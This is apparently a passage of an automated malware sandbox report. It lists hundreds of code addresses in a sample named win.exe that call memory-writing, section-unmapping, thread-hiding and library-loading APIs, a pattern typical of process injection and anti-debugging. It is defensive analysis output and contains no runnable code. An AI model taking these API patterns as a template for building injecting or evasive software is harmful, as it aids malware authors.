Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B00 NtWriteVirtualMemory,	16_2_020B4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4F14 NtWriteVirtualMemory,	16_2_020B4F14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B2D NtWriteVirtualMemory,	16_2_020B4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B25 NtWriteVirtualMemory,	16_2_020B4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,	16_2_020B2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9B4B NtUnmapViewOfSection,	16_2_020B9B4B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B5C NtWriteVirtualMemory,	16_2_020B4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4F8C NtWriteVirtualMemory,	16_2_020B4F8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9B83 NtUnmapViewOfSection,	16_2_020B9B83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4797 NtWriteVirtualMemory,	16_2_020B4797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4FB8 NtWriteVirtualMemory,	16_2_020B4FB8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8BBE NtWriteVirtualMemory,	16_2_020B8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4BB0 NtWriteVirtualMemory,	16_2_020B4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9BCB NtUnmapViewOfSection,	16_2_020B9BCB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B93CD NtProtectVirtualMemory,	16_2_020B93CD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B47F4 NtWriteVirtualMemory,	16_2_020B47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4C16 NtWriteVirtualMemory,	16_2_020B4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9C14 NtUnmapViewOfSection,	16_2_020B9C14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5023 NtWriteVirtualMemory,	16_2_020B5023
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4847 NtWriteVirtualMemory,	16_2_020B4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4C68 NtWriteVirtualMemory,	16_2_020B4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B506F NtWriteVirtualMemory,	16_2_020B506F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4899 NtWriteVirtualMemory,	16_2_020B4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B44CF NtWriteVirtualMemory,	16_2_020B44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B50C5 NtWriteVirtualMemory,	16_2_020B50C5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5CD9 NtAllocateVirtualMemory,	16_2_020B5CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B98D8 NtUnmapViewOfSection,	16_2_020B98D8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B48E3 NtWriteVirtualMemory,	16_2_020B48E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4CE4 NtWriteVirtualMemory,	16_2_020B4CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5CE4 NtAllocateVirtualMemory,	16_2_020B5CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B60FA NtWriteVirtualMemory,	16_2_020B60FA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,	16_2_020B28FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B98F3 NtUnmapViewOfSection,	16_2_020B98F3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4D2A NtWriteVirtualMemory,	16_2_020B4D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5D21 NtAllocateVirtualMemory,	16_2_020B5D21
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4520 NtWriteVirtualMemory,	16_2_020B4520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9933 NtUnmapViewOfSection,	16_2_020B9933
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4948 NtWriteVirtualMemory,	16_2_020B4948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5146 NtWriteVirtualMemory,	16_2_020B5146
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B995D NtUnmapViewOfSection,	16_2_020B995D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9951 NtUnmapViewOfSection,	16_2_020B9951
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B996E NtUnmapViewOfSection,	16_2_020B996E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5D71 NtAllocateVirtualMemory,	16_2_020B5D71
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4570 NtWriteVirtualMemory,	16_2_020B4570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B518F NtWriteVirtualMemory,	16_2_020B518F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4D83 NtWriteVirtualMemory,	16_2_020B4D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4985 NtWriteVirtualMemory,	16_2_020B4985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B999B NtUnmapViewOfSection,	16_2_020B999B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5D90 NtAllocateVirtualMemory,	16_2_020B5D90
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5DAD NtAllocateVirtualMemory,	16_2_020B5DAD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45B5 NtWriteVirtualMemory,	16_2_020B45B5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B51C7 NtWriteVirtualMemory,	16_2_020B51C7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4DE9 NtWriteVirtualMemory,	16_2_020B4DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5DE9 NtAllocateVirtualMemory,	16_2_020B5DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B99E9 NtUnmapViewOfSection,	16_2_020B99E9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45E0 NtWriteVirtualMemory,	16_2_020B45E0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45E4 NtWriteVirtualMemory,	16_2_020B45E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45F9 NtWriteVirtualMemory,	16_2_020B45F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B49F4 NtWriteVirtualMemory,	16_2_020B49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9417 NtProtectVirtualMemory,	17_2_007A9417
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A98CB LoadLibraryA,NtMapViewOfSection,	17_2_007A98CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,	17_2_007A0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5CB3 NtAllocateVirtualMemory,	17_2_007A5CB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1D2E NtWriteVirtualMemory,LoadLibraryA,	17_2_007A1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4C68 NtWriteVirtualMemory,	17_2_007A4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A506F NtWriteVirtualMemory,	17_2_007A506F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4847 NtWriteVirtualMemory,	17_2_007A4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5023 NtWriteVirtualMemory,	17_2_007A5023
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4C16 NtWriteVirtualMemory,	17_2_007A4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9C14 NtMapViewOfSection,	17_2_007A9C14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A60FA NtWriteVirtualMemory,	17_2_007A60FA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A28FE NtWriteVirtualMemory,LoadLibraryA,	17_2_007A28FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A98F3 NtMapViewOfSection,	17_2_007A98F3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A48E3 NtWriteVirtualMemory,	17_2_007A48E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4CE4 NtWriteVirtualMemory,	17_2_007A4CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5CE4 NtAllocateVirtualMemory,	17_2_007A5CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A98D8 NtMapViewOfSection,	17_2_007A98D8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5CD9 NtAllocateVirtualMemory,	17_2_007A5CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A44CF NtWriteVirtualMemory,	17_2_007A44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A50C5 NtWriteVirtualMemory,	17_2_007A50C5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4899 NtWriteVirtualMemory,	17_2_007A4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4570 NtWriteVirtualMemory,	17_2_007A4570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5D71 NtAllocateVirtualMemory,	17_2_007A5D71
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A996E NtMapViewOfSection,	17_2_007A996E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A995D NtMapViewOfSection,	17_2_007A995D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9951 NtMapViewOfSection,	17_2_007A9951
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4948 NtWriteVirtualMemory,	17_2_007A4948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5146 NtWriteVirtualMemory,	17_2_007A5146
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9933 NtMapViewOfSection,	17_2_007A9933
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4D2A NtWriteVirtualMemory,	17_2_007A4D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4520 NtWriteVirtualMemory,	17_2_007A4520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5D21 NtAllocateVirtualMemory,	17_2_007A5D21
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45F9 NtWriteVirtualMemory,	17_2_007A45F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A49F4 NtWriteVirtualMemory,	17_2_007A49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4DE9 NtWriteVirtualMemory,	17_2_007A4DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5DE9 NtAllocateVirtualMemory,	17_2_007A5DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A99E9 NtMapViewOfSection,	17_2_007A99E9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45E0 NtWriteVirtualMemory,	17_2_007A45E0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45E4 NtWriteVirtualMemory,	17_2_007A45E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A51C7 NtWriteVirtualMemory,	17_2_007A51C7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45B5 NtWriteVirtualMemory,	17_2_007A45B5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5DAD NtAllocateVirtualMemory,	17_2_007A5DAD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A999B NtMapViewOfSection,	17_2_007A999B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5D90 NtAllocateVirtualMemory,	17_2_007A5D90
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A518F NtWriteVirtualMemory,	17_2_007A518F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4D83 NtWriteVirtualMemory,	17_2_007A4D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4985 NtWriteVirtualMemory,	17_2_007A4985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A7E78 NtWriteVirtualMemory,	17_2_007A7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A73 NtWriteVirtualMemory,	17_2_007A4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9A74 NtMapViewOfSection,	17_2_007A9A74
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9A57 NtMapViewOfSection,	17_2_007A9A57
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9A41 NtMapViewOfSection,	17_2_007A9A41
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5E47 NtAllocateVirtualMemory,	17_2_007A5E47
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4638 NtWriteVirtualMemory,	17_2_007A4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3E30 NtWriteVirtualMemory,	17_2_007A3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5230 NtWriteVirtualMemory,	17_2_007A5230
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4E36 NtWriteVirtualMemory,	17_2_007A4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9A2F NtMapViewOfSection,	17_2_007A9A2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A27 NtWriteVirtualMemory,	17_2_007A4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9A03 NtMapViewOfSection,	17_2_007A9A03
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9AEC NtMapViewOfSection,	17_2_007A9AEC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A46D3 NtWriteVirtualMemory,	17_2_007A46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1ED7 NtWriteVirtualMemory,	17_2_007A1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5EA8 NtAllocateVirtualMemory,	17_2_007A5EA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9AAF NtMapViewOfSection,	17_2_007A9AAF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4AA0 NtWriteVirtualMemory,	17_2_007A4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4E99 NtWriteVirtualMemory,	17_2_007A4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4694 NtWriteVirtualMemory,	17_2_007A4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9A95 NtMapViewOfSection,	17_2_007A9A95
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A528D NtWriteVirtualMemory,	17_2_007A528D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A87 NtWriteVirtualMemory,	17_2_007A4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B5C NtWriteVirtualMemory,	17_2_007A4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9B4B NtMapViewOfSection,	17_2_007A9B4B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2F3E NtWriteVirtualMemory,LoadLibraryA,	17_2_007A2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B2D NtWriteVirtualMemory,	17_2_007A4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B25 NtWriteVirtualMemory,	17_2_007A4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4F14 NtWriteVirtualMemory,	17_2_007A4F14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B00 NtWriteVirtualMemory,	17_2_007A4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2B01 NtWriteVirtualMemory,	17_2_007A2B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A47F4 NtWriteVirtualMemory,	17_2_007A47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9BCB NtMapViewOfSection,	17_2_007A9BCB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A93CD NtProtectVirtualMemory,	17_2_007A93CD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4FB8 NtWriteVirtualMemory,	17_2_007A4FB8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8BBE NtWriteVirtualMemory,	17_2_007A8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4BB0 NtWriteVirtualMemory,	17_2_007A4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4797 NtWriteVirtualMemory,	17_2_007A4797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4F8C NtWriteVirtualMemory,	17_2_007A4F8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9B83 NtMapViewOfSection,	17_2_007A9B83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9417 NtProtectVirtualMemory,	18_2_020B9417
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,	18_2_020B0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5CB3 NtAllocateVirtualMemory,	18_2_020B5CB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B98CB LoadLibraryA,NtSetInformationThread,	18_2_020B98CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,	18_2_020B1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9A03 NtSetInformationThread,	18_2_020B9A03
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9A2F NtSetInformationThread,	18_2_020B9A2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A27 NtWriteVirtualMemory,	18_2_020B4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4638 NtWriteVirtualMemory,	18_2_020B4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3E30 NtWriteVirtualMemory,	18_2_020B3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5230 NtWriteVirtualMemory,	18_2_020B5230
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4E36 NtWriteVirtualMemory,	18_2_020B4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9A41 NtSetInformationThread,	18_2_020B9A41
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5E47 NtAllocateVirtualMemory,	18_2_020B5E47
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9A57 NtSetInformationThread,	18_2_020B9A57
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B7E78 NtWriteVirtualMemory,	18_2_020B7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A73 NtWriteVirtualMemory,	18_2_020B4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9A74 NtSetInformationThread,	18_2_020B9A74
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B528D NtWriteVirtualMemory,	18_2_020B528D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A87 NtWriteVirtualMemory,	18_2_020B4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4E99 NtWriteVirtualMemory,	18_2_020B4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9A95 NtSetInformationThread,	18_2_020B9A95
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4694 NtWriteVirtualMemory,	18_2_020B4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5EA8 NtAllocateVirtualMemory,	18_2_020B5EA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9AAF NtSetInformationThread,	18_2_020B9AAF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4AA0 NtWriteVirtualMemory,	18_2_020B4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B46D3 NtWriteVirtualMemory,	18_2_020B46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1ED7 NtWriteVirtualMemory,	18_2_020B1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9AEC NtSetInformationThread,	18_2_020B9AEC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2B01 NtWriteVirtualMemory,	18_2_020B2B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B00 NtWriteVirtualMemory,	18_2_020B4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4F14 NtWriteVirtualMemory,	18_2_020B4F14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B2D NtWriteVirtualMemory,	18_2_020B4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B25 NtWriteVirtualMemory,	18_2_020B4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,	18_2_020B2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9B4B NtSetInformationThread,	18_2_020B9B4B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B5C NtWriteVirtualMemory,	18_2_020B4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4F8C NtWriteVirtualMemory,	18_2_020B4F8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9B83 NtSetInformationThread,	18_2_020B9B83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4797 NtWriteVirtualMemory,	18_2_020B4797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4FB8 NtWriteVirtualMemory,	18_2_020B4FB8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8BBE NtWriteVirtualMemory,	18_2_020B8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4BB0 NtWriteVirtualMemory,	18_2_020B4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9BCB NtSetInformationThread,	18_2_020B9BCB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B93CD NtProtectVirtualMemory,	18_2_020B93CD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B47F4 NtWriteVirtualMemory,	18_2_020B47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4C16 NtWriteVirtualMemory,	18_2_020B4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9C14 NtSetInformationThread,	18_2_020B9C14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5023 NtWriteVirtualMemory,	18_2_020B5023
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4847 NtWriteVirtualMemory,	18_2_020B4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4C68 NtWriteVirtualMemory,	18_2_020B4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B506F NtWriteVirtualMemory,	18_2_020B506F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4899 NtWriteVirtualMemory,	18_2_020B4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B44CF NtWriteVirtualMemory,	18_2_020B44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B50C5 NtWriteVirtualMemory,	18_2_020B50C5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5CD9 NtAllocateVirtualMemory,	18_2_020B5CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B98D8 NtSetInformationThread,	18_2_020B98D8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B48E3 NtWriteVirtualMemory,	18_2_020B48E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4CE4 NtWriteVirtualMemory,	18_2_020B4CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5CE4 NtAllocateVirtualMemory,	18_2_020B5CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B60FA NtWriteVirtualMemory,	18_2_020B60FA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,	18_2_020B28FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B98F3 NtSetInformationThread,	18_2_020B98F3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4D2A NtWriteVirtualMemory,	18_2_020B4D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5D21 NtAllocateVirtualMemory,	18_2_020B5D21
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4520 NtWriteVirtualMemory,	18_2_020B4520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9933 NtSetInformationThread,	18_2_020B9933
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4948 NtWriteVirtualMemory,	18_2_020B4948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5146 NtWriteVirtualMemory,	18_2_020B5146
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B995D NtSetInformationThread,	18_2_020B995D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B9951 NtSetInformationThread,	18_2_020B9951
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B996E NtSetInformationThread,	18_2_020B996E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5D71 NtAllocateVirtualMemory,	18_2_020B5D71
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4570 NtWriteVirtualMemory,	18_2_020B4570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B518F NtWriteVirtualMemory,	18_2_020B518F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4D83 NtWriteVirtualMemory,	18_2_020B4D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4985 NtWriteVirtualMemory,	18_2_020B4985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B999B NtSetInformationThread,	18_2_020B999B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5D90 NtAllocateVirtualMemory,	18_2_020B5D90
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5DAD NtAllocateVirtualMemory,	18_2_020B5DAD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B45B5 NtWriteVirtualMemory,	18_2_020B45B5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B51C7 NtWriteVirtualMemory,	18_2_020B51C7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4DE9 NtWriteVirtualMemory,	18_2_020B4DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5DE9 NtAllocateVirtualMemory,	18_2_020B5DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B99E9 NtSetInformationThread,	18_2_020B99E9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B45E0 NtWriteVirtualMemory,	18_2_020B45E0
